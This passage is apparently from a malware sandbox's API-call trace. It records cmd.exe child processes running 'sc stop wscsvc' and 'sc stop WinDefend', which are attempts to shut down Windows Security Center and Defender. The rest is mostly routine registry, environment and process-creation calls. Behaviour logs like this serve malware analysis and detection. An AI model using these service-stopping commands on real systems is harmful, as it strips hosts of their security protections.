lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x1, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x0, lpData=0x41eac0*=0x1, lpcbData=0x41eab8*=0x1000) returned 0x2 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x0, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x9, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x9, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x0, lpData=0x41eac0*=0x9, lpcbData=0x41eab8*=0x1000) returned 0x2 [0020.799] RegCloseKey (hKey=0x68) returned 0x0 [0020.799] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0020.799] srand (_Seed=0x5a0b3db4) [0020.799] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop wscsvc" [0020.799] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop wscsvc" [0020.799] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.800] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x492020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0020.800] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.800] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.800] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.800] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0020.800] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0020.800] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0020.800] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0020.800] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0020.800] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0020.800] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0020.800] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0020.800] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0020.800] GetEnvironmentStringsW () returned 0x492230* [0020.800] FreeEnvironmentStringsW (penv=0x492230) returned 1 [0020.800] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.800] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.800] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0020.800] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0020.800] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0020.800] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0020.801] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0020.801] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0020.801] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0020.801] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0020.801] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x41f880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x41f880, lpFilePart=0x41f87c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x41f87c*="Desktop") returned 0x25 [0020.801] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.801] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x41f5fc | out: lpFindFileData=0x41f5fc) returned 0x491e98 [0020.801] FindClose (in: hFindFile=0x491e98 | out: hFindFile=0x491e98) returned 1 [0020.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x41f5fc | out: lpFindFileData=0x41f5fc) returned 0x491e98 [0020.801] FindClose (in: hFindFile=0x491e98 | out: hFindFile=0x491e98) returned 1 [0020.801] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0020.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x41f5fc | out: lpFindFileData=0x41f5fc) returned 0x491e98 [0020.801] FindClose (in: hFindFile=0x491e98 | out: hFindFile=0x491e98) returned 1 [0020.801] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.801] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0020.802] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0020.802] GetEnvironmentStringsW () returned 0x4940a0* [0020.802] FreeEnvironmentStringsW (penv=0x4940a0) returned 1 [0020.802] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.802] GetConsoleOutputCP () returned 0x1b5 [0020.802] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.802] GetUserDefaultLCID () returned 0x409 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x41f9c0, cchData=128 | out: lpLCData="0") returned 2 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x41f9c0, cchData=128 | out: lpLCData="0") returned 2 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x41f9c0, cchData=128 | out: lpLCData="1") returned 2 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0020.803] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0020.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0020.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0020.804] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0020.804] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0020.804] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0020.805] GetConsoleTitleW (in: lpConsoleTitle=0x492da8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.805] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.805] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0020.805] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0020.805] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0020.806] _wcsicmp (_String1="sc", _String2=")") returned 74 [0020.806] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0020.806] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0020.806] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0020.807] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0020.807] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0020.807] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0020.808] GetConsoleTitleW (in: lpConsoleTitle=0x41f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.808] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.808] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.808] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.808] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.808] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.808] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.808] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.808] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.808] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.808] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.808] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.808] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.808] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.808] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.808] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.808] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.809] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.809] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.809] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.809] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.809] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.809] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.809] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.809] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.809] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.809] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.809] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.809] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.809] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.809] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.809] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.809] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.809] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.809] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.809] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.809] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.809] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.809] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.809] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.809] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.809] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.809] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.809] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.809] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.809] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.809] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.809] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.809] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.809] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.809] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.809] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.809] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.809] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.809] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.809] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.810] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.810] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.810] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.810] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.810] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.810] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.810] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.810] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.810] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.810] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.810] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.810] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.810] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.810] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.810] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.810] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.810] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.810] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.810] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.810] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.810] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.810] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.810] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.810] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.810] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.810] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.810] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.810] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.810] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.810] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0020.810] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0020.810] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0020.811] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0020.811] SetErrorMode (uMode=0x0) returned 0x0 [0020.811] SetErrorMode (uMode=0x1) returned 0x0 [0020.811] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4807f8, lpFilePart=0x41f1d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x41f1d8*="Desktop") returned 0x25 [0020.811] SetErrorMode (uMode=0x0) returned 0x1 [0020.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.811] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0020.816] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.817] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x41ef54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x41ef54) returned 0xffffffff [0020.817] GetLastError () returned 0x2 [0020.817] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x41ef54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x41ef54) returned 0xffffffff [0020.818] GetLastError () returned 0x2 [0020.818] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x41ef54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x41ef54) returned 0x493440 [0020.818] FindClose (in: hFindFile=0x493440 | out: hFindFile=0x493440) returned 1 [0020.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x41ef54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x41ef54) returned 0xffffffff [0020.818] GetLastError () returned 0x2 [0020.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x41ef54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x41ef54) returned 0x493440 [0020.818] FindClose (in: hFindFile=0x493440 | out: hFindFile=0x493440) returned 1 [0020.818] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0020.818] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0020.818] GetConsoleTitleW (in: lpConsoleTitle=0x41f44c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.819] InitializeProcThreadAttributeList (in: lpAttributeList=0x41f2d4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x41f39c | out: lpAttributeList=0x41f2d4, lpSize=0x41f39c) returned 1 [0020.819] UpdateProcThreadAttribute (in: lpAttributeList=0x41f2d4, dwFlags=0x0, Attribute=0x60001, lpValue=0x41f394, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x41f2d4, lpPreviousValue=0x0) returned 1 [0020.819] GetStartupInfoW (in: lpStartupInfo=0x41f290 | out: lpStartupInfo=0x41f290*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0020.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.820] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.820] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0020.821] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop wscsvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x41f330*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop wscsvc", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x41f37c | out: lpCommandLine="sc stop wscsvc", lpProcessInformation=0x41f37c*(hProcess=0x78, hThread=0x74, dwProcessId=0xae4, dwThreadId=0xae8)) returned 1 [0020.826] CloseHandle (hObject=0x74) returned 1 [0020.826] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0020.826] GetEnvironmentStringsW () returned 0x495ee0* [0020.826] FreeEnvironmentStringsW (penv=0x495ee0) returned 1 [0020.826] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.795] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x41f270 | out: lpExitCode=0x41f270*=0x426) returned 1 [0021.795] CloseHandle (hObject=0x78) returned 1 [0021.795] _vsnwprintf (in: _Buffer=0x41f3b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x41f27c | out: _Buffer="00000426") returned 8 [0021.795] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000426") returned 1 [0021.795] GetEnvironmentStringsW () returned 0x4940a0* [0021.795] FreeEnvironmentStringsW (penv=0x4940a0) returned 1 [0021.795] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.795] GetEnvironmentStringsW () returned 0x4940a0* [0021.796] FreeEnvironmentStringsW (penv=0x4940a0) returned 1 [0021.796] DeleteProcThreadAttributeList (in: lpAttributeList=0x41f2d4 | out: lpAttributeList=0x41f2d4) [0021.796] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.796] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.796] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.796] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.796] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.796] SetConsoleInputExeNameW () returned 0x1 [0021.796] GetConsoleOutputCP () returned 0x1b5 [0021.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.796] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.797] exit (_Code=1062) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x657d0000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop WinDefend" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 417 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 418 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 419 start_va = 